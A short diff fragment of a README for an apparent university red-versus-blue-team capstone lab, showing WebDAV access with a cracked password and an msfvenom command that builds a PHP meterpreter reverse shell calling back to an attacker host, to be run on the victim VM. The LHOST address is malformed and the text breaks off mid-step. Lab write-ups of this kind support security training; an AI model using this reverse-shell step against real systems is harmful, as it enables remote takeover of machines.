Jay-Idrees/UPenn-CyberSecurity-Red-vs-Blue-Team-Metasploit-Kibana-Capstone/README.md

 - Now access Webdav with the username ryan and the cracked password : by typing `dav://192.168.1.105/webdav/` in browser

-- Msfvenom to create a reverse shell script
+- Msfvenom to create a reverse shell script in Kali Linux (hacker's VM)

+- `msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.1.90 LPORT=666 -f raw > shell.php`

+- Once the

 - Run the malacious shell script on the Victim (Capstone) VM